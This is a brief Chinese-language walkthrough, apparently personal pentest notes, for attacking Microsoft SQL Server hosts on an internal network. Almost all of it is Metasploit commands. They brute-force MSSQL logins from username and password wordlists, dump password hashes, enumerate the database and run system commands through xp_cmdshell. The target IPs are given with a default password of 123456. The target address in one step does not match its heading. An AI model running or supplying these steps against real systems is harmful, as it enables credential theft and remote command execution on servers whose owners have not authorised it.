1.在内网环境中收集开放1433端口的服务器:
这个步骤可以参考此篇文章:https://www.cnblogs.com/xiehong/p/12502100.html
2.针对开放1433端口的服务器开始渗透:
2.1利用msf 爆破1433端口:192.168.10.251
(1)use auxiliary/scanner/mssql/mssql_login
(2)set RHOSTS 192.168.109.139
(3)set USER_FILE /home/xh/shentou/usr_mysql.txt
(4)set PASS_FILE /home/xh/shentou/pwd_mysql.txt
(5)run
2.2查找/捕获服务器的口令
(1)use auxiliary/scanner/mssql/mssql_hashdump
(2)set RHOSTS 192.168.10.251
(3)set PASSWORD 123456
(4)run
2.3浏览MSSQL
(1)use auxiliary/admin/mssql/mssql_enum
(2)set RHOSTS 192.168.10.236
(3)set PASSWORD 123456
(4)run
2.4重新载入xp_cmd功能
(1)use auxiliary/admin/mssql/mssql_exec
(2)set CMD 'ipconfig'
(3)set RHOSTS 192.168.10.251
(4)set PASSWORD 123456
(5)run